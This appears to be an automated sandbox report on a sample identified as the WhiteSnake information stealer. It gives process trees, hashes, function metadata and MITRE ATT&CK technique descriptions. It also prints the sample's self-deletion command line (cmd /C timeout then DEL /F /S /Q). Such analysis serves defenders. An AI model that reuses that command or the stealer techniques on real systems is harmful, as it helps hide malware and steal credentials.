Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff6ce510000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:07:00
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:07:01
Start date:	06/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff740a70000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:07:01
Start date:	06/11/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 3
Imagebase:	0x7ff76f9d0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848E62953 Relevance: 4.4, Strings: 2, Instructions: 1853COMMON

Download Yara Rule

Strings

jCH, xrefs: 00007FF848E62E0C
jCH, xrefs: 00007FF848E62F17

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID: jCH$jCH
API String ID: 0-284820611
Opcode ID: 36b0d51e7d435d0710047bf06a6f6d126e76cf1ef89ce9fa90086ad9cf650820
Instruction ID: 1886d5a6a137432c4c85b1d27f7fb453ddd8b762369a30b2f94832976b1525d4
Opcode Fuzzy Hash: 36b0d51e7d435d0710047bf06a6f6d126e76cf1ef89ce9fa90086ad9cf650820
Instruction Fuzzy Hash: B1D26F30A1C9499FDB95EF2CC894AA93BE1FF59344F5405B9E44EDB2A6CB35E802C740

Function 00007FF848E67BB1 Relevance: 1.8, APIs: 1, Instructions: 255
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF848E67DD3

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: b1fe54e2a1edd32d4e392cf3f3b198e5f4431e767f0b315bde8fd35e0da87acc
Instruction ID: ffe862d24e2743d4bf798a5752def2ee9ae89be3debd11ca301054f4dd5bb581
Opcode Fuzzy Hash: b1fe54e2a1edd32d4e392cf3f3b198e5f4431e767f0b315bde8fd35e0da87acc
Instruction Fuzzy Hash: FD814770D08A5D8FEB98EF18C845BE9BBF1FB59340F0052AAD44DE3251DB74A9848F85

Function 00007FF848E67CFD Relevance: 1.6, APIs: 1, Instructions: 118
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32 ref: 00007FF848E67DD3

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 36755ca945adb6504da9d91b8c17dae2be98733c2f3b12057c563c7e2100d326
Instruction ID: 4cb3a0c3c03e7639a959b13e25db243191f694a5169f7a33ccedb3db7b14b6ab
Opcode Fuzzy Hash: 36755ca945adb6504da9d91b8c17dae2be98733c2f3b12057c563c7e2100d326
Instruction Fuzzy Hash: E041C970D19A1D8FDBA4EF18C885BE9B7B1FB59300F4052A9D40DE3251DB74AA84CF45

Function 00007FF848E6BDF8 Relevance: .4, Instructions: 406
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8863a4a7fe5f5ae4c69308b6fa715dbf21dd20daa7574e001818c65bc9bc28f1
Instruction ID: 6a1815a8e05605353e54d5b8009568f781641f64a1eccf70056f798bd936474c
Opcode Fuzzy Hash: 8863a4a7fe5f5ae4c69308b6fa715dbf21dd20daa7574e001818c65bc9bc28f1
Instruction Fuzzy Hash: 83F10A3090992D8FDBA9EF14C894BA9B7B1FF59341F5045E9D00EE7291DB35AA81CF04

Function 00007FF848E6D4C1 Relevance: .3, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c075cfe8901b05adca58722d8fcff05fef327f428dc4cab19c6f5e7f1983daf
Instruction ID: c6780f9989ebadcef07b962b534b3b5d94034485009244c05e90758017965328
Opcode Fuzzy Hash: 2c075cfe8901b05adca58722d8fcff05fef327f428dc4cab19c6f5e7f1983daf
Instruction Fuzzy Hash: 0EB1D87090962D8FDBA4EF18C894BE9B7B1FF59301F9001A9D04DE7291DB35AA85CF04

Function 00007FF848E6AD9E Relevance: .3, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d8b810ba4555bacd3d6654cf2568387294f62e4c5eb5f141eba8cbc32a9c39
Instruction ID: 3c23561947b0370edb436c7b35a92d3307f627ea31b51a4a250d77cc7f0cd8a7
Opcode Fuzzy Hash: 65d8b810ba4555bacd3d6654cf2568387294f62e4c5eb5f141eba8cbc32a9c39
Instruction Fuzzy Hash: D1B1E570D1992D8FEBA5EB18C899BA9B7B1FF59340F4001E9D00DE3292DB35A981CF44

Function 00007FF848E661C0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e622a6f61604c3a8ff310ef609eaca9b72c86001602ef008a28a787abea7f9
Instruction ID: a5d55a18de9edbc6a0de9e57066f35c2f9a3ef5d1b6fb70b11fecab9c49e2351
Opcode Fuzzy Hash: c8e622a6f61604c3a8ff310ef609eaca9b72c86001602ef008a28a787abea7f9
Instruction Fuzzy Hash: 10C01232A00409CECB10EE68E4010FAB331EF86299F50247AD128E3181CB32E8218B88

Function 00007FF848E66219 Relevance: 1.9, APIs: 1, Instructions: 369
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF848E664A9

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14426be66536099592767ec6ede468d6feb847dccf75069c38ef365b46ac1228
Instruction ID: c9a6f40798cf2aa8c3c26452ba30c9a6b4a003d763f8dfcbea90c49960cbf17c
Opcode Fuzzy Hash: 14426be66536099592767ec6ede468d6feb847dccf75069c38ef365b46ac1228
Instruction Fuzzy Hash: 42B1AF70A1CA0D8FEB98EF58D8856B8B7F1FB59310F54016ED04DD7262DB35A846CB44

Non-executed Functions

Function 00007FF848E67415 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b05c33cc7c4bf268aa1bc1bc85a49e2dcf2a1b61632639847615bba77c5949
Instruction ID: 188e62c171744a4dadb062c4b892bff1df170a5c14d3be1d165eda590d5dfdd9
Opcode Fuzzy Hash: c5b05c33cc7c4bf268aa1bc1bc85a49e2dcf2a1b61632639847615bba77c5949
Instruction Fuzzy Hash: 27128E30918A8D8FEB68EF28C855BE977E0FB59350F50427ED84EC7292DB34A541CB45

Function 00007FF848E66C29 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1b4ab92cc3ac5a472fa870efb0ced4988fc734d64f112789eebc435cbc3147
Instruction ID: 96294dc1823fa5b43a885eefd454310163fe81d8a7f9aebe7306108dec2385cf
Opcode Fuzzy Hash: df1b4ab92cc3ac5a472fa870efb0ced4988fc734d64f112789eebc435cbc3147
Instruction Fuzzy Hash: B1816D70908A8D8FDFA8EF18C845BE97BE1FF59350F10412AE84DC7252DB74A985CB81

Function 00007FF848E6EEE9 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd129a5aa5f54d0a865b03f5a47e5e28913c28f7078e00d5006f6413cfeafa84
Instruction ID: e7b4a131baf567b07652458db41f8e048e50933eb7f49e4f8dc98e7ae1918463
Opcode Fuzzy Hash: cd129a5aa5f54d0a865b03f5a47e5e28913c28f7078e00d5006f6413cfeafa84
Instruction Fuzzy Hash: 21411430D0D65E9FDB88EB98C494BADB7B2FF59300F6041A9D00DE7295CB39A981CB54

Function 00007FF848E72FA3 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8b8721cd0380bd9af126730047a4c02c84e9571374870e844b013408725e66
Instruction ID: 81deba7e1c2a49922f8e76a073abeeca301ad4d2501deeb0f2aa29d854975d62
Opcode Fuzzy Hash: 9f8b8721cd0380bd9af126730047a4c02c84e9571374870e844b013408725e66
Instruction Fuzzy Hash: 1F31C630D095199FCB95EF68D894AEDB7B5FF5A300F5051A9D00EE7292CB34AA80CF05

Function 00007FF848E710FF Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febc4b46c5dbea5b7f0038d34f5046f2d43072783de860d1373c22a226977517
Instruction ID: fce5162486ddd7d625557ad3591cba04566190997175313c6cca23630764b63f
Opcode Fuzzy Hash: febc4b46c5dbea5b7f0038d34f5046f2d43072783de860d1373c22a226977517
Instruction Fuzzy Hash: 9F313A3180962C8AEB68EB25E8907F9B3B1FF55310F4451ADD04D97281DF36AA85DF50

Function 00007FF848E6CF36 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3915934fdf88ba708311633cc7dd37f12f2e2f401f4ed8a2ca3817cc24f9a00
Instruction ID: 99a29d3ba7736271565863f3a1bdbd062e7fae456903371e76f3d93bae859b14
Opcode Fuzzy Hash: d3915934fdf88ba708311633cc7dd37f12f2e2f401f4ed8a2ca3817cc24f9a00
Instruction Fuzzy Hash: 40F03A70D0892CCECB64EF68C4406E8B3B1FF19354F8046E9D22DE3281CB75AA808F48

Function 00007FF848E6C68F Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78fc818fb92ffae9c7a2f693544543cd609faa7795796f6c0865e41c41638fcd
Instruction ID: 195605937a89f9a90f6843a26c4f4aa29b10cea3a94c4b5457dc2f8ecad1aa55
Opcode Fuzzy Hash: 78fc818fb92ffae9c7a2f693544543cd609faa7795796f6c0865e41c41638fcd
Instruction Fuzzy Hash: 31F0A470D0C91D8ECB65EF1884406F8B3B1FB59344F8055B9D11DE3242CB35A9808F88

Function 00007FF848E6CB76 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 667108748eed591d9f187f877aec91609388187d4e187041dad7cf5d7fbc2d07
Instruction ID: 543009d10db4f9d777d6fd50bb21a8e53eb5a12cc3b9eb48d80cab3b1848ca97
Opcode Fuzzy Hash: 667108748eed591d9f187f877aec91609388187d4e187041dad7cf5d7fbc2d07
Instruction Fuzzy Hash: F3F0A470D0C61D8ECBA5EF1884406E8B3B1FB59344F8055A9D11DE3251CB35AA80CF48

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: WhiteSnake

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\nb3ruhpgao\report.lock

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
file.exe

Function 00007FF848E67BB1 Relevance: 1.8, APIs: 1, Instructions: 255
encryptionCOMMON

Function 00007FF848E67CFD Relevance: 1.6, APIs: 1, Instructions: 118
encryptionCOMMON

Function 00007FF848E6BDF8 Relevance: .4, Instructions: 406
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre